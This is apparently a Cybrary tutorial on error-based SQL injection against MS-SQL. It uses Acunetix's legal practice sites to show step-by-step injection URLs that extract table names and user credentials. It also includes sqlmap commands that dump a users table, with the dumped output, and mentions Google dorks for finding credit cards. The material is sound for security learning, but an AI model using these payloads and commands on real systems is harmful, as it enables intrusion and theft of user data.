Error Based Injection

January 18, 2018 | Views: 3436

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Error Based Injection

Error based injection mainly concentrated on Hacking Microsoft powered technologies like asp and aspx. Error based injection works on MS-SQL database and is bit different from the previous attack that is Union Based injection deployed on My-SQL database.

• Here Database will be Ms-Sql

 

Database:

MY-SQL : PHP

MS-SQL :  .asp or .aspx

 

Difference between Union and Error Based Injection.

1.  Extracting all Tables at one time from database

•  Information_schema.tables will not return you the entire table names.

 

2.   MS SQL works on STACK principal means LAST IN FIRST OUT.

• Hence the table which is on the top of the stack is going to be fetched first at the time of extraction for the same.

 

3.  Functions like database() , version() does not works in MS-SQL.

 

4.  “order by” or “union” does not works on MsSql

 

 

Target:

testasp.vulnweb.com

• It is a legal platform being provided by Acunetix for Security Testing

 

Step 1: Get any GET method in the URL of the website.

• We have to look for any Somethoing=Something.

• Eg. Id=1 or pid=16 or product=milk

http://testasp.vulnweb.com/showforum.asp?id=0

 

Step 2: Check the exception handling.

http://testasp.vulnweb.com/showforum.asp?id=0′

 

Step 3: Check the conditions required for further attack.

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0;

 

Note : Error Based Injection works on LIFO rule. Last in First out.

 

For Example: If we have a database with tables like followings

threads -> 1

teacher->2

classes->3

fee->4

users->5

 

Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and

1=convert(int,(select top 1 table_name from information_schema.tables));

• Got Table :  ‘threads’ X

 

http://testasp.vulnweb.com/showforum.asp?id=0 and

1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘threads’)));

• Target : ‘users’

 

Step 5: Get the respective columns of the users table

http://testasp.vulnweb.com/showforum.asp?id=0 and

1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’users’ and column_name not in (‘uname’)));

• Target Column : uname, upass

 

Step 6: Get the uname and upass

http://testasp.vulnweb.com/showforum.asp?id=0 and

1=convert(int,(select top 1 upass from users));

• uname:admin

• upass: none

 

Stack Based Query

Requirements

1.   SQLMAP : its a python script based automated vulnerability assessment and penetration testing tool.

2.   Kali Linux : SQLmap is inbuild in Kali Linux

• You can also download the sqlmap version for windows from its official website.

 

Introduction to SQL MAP

————————

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

 

Step 1: Open Your Linux Terminal

Step 2: python sqlmap -u http://testphp.vulnweb.com/search.php?test=query –dbs

Output:

Here We can see we got these below databases.

[09:54:16] [INFO] fetching database names

Available databases [2]:

[*] acuart <——- Target Database

[*] information_schema

Step 3: Get the tables of the database

python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart –tables

Here We got all the tables available in the acuart database

Output:

[09:58:49] [INFO] fetching tables for database: ‘acuart’

Database: acuart

[8 tables]

+———–+

| artists   |

| carts     |

| categ     |

| featured  |

| guestbook |

| pictures  |

| products  |

| users     |——-> Target Table

+———–+

 

 

 

 

Step 4: Get the columns of the users table

python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -T users –columns

Output:

Database: acuart

Table: users

[8 columns]

+———+————–+

| Column  | Type         |

+———+————–+

| address | mediumtext   |

| cart    | varchar(100) |

| cc      | varchar(100) |

| email   | varchar(100) |

| name    | varchar(100) |

| pass    | varchar(100) |—> Target

| phone   | varchar(100) |

| uname   | varchar(100) |—> Target

 

Step 5: Get the data from the columns of the above table.

python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -U test -T users –dump

Output:

Database: acuart

Table: users

[1 entry]

+—————————+————–+———————————-+——+——-+———+——————–+———+

| cc                        | name         | cart                             | pass | uname | phone   | email              | address |

+—————————+————–+———————————-+——+——-+———+——————–+———+

| De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test  | 2323345 | jurandir@gmail.com | foda-se |

+—————————+————–+———————————-+——+——-+———+——————–+———+

 

Google Hacking Database

Johny i Hack Stuff : Searched –> Google –> Credit Cards

• Google Dorks

Filteration of results from google database.

#inurl  — Green Line in Google Search

#intitle – Blue Line in Google Search

#intext – Black Line in Google Seach

#filetype – Type of file that we needed i.e. pdf, ppt, docs etc

• IP CAMERA

Searching tools

www.exploit-db.com

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
1 Comment
  1. guy is very vague in his steps. would be really helpful if u took your time and when through the steps instead of assuming the user knows what you’re doing. It won’t hurt the experienced users but it sure will help the novice ones.

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel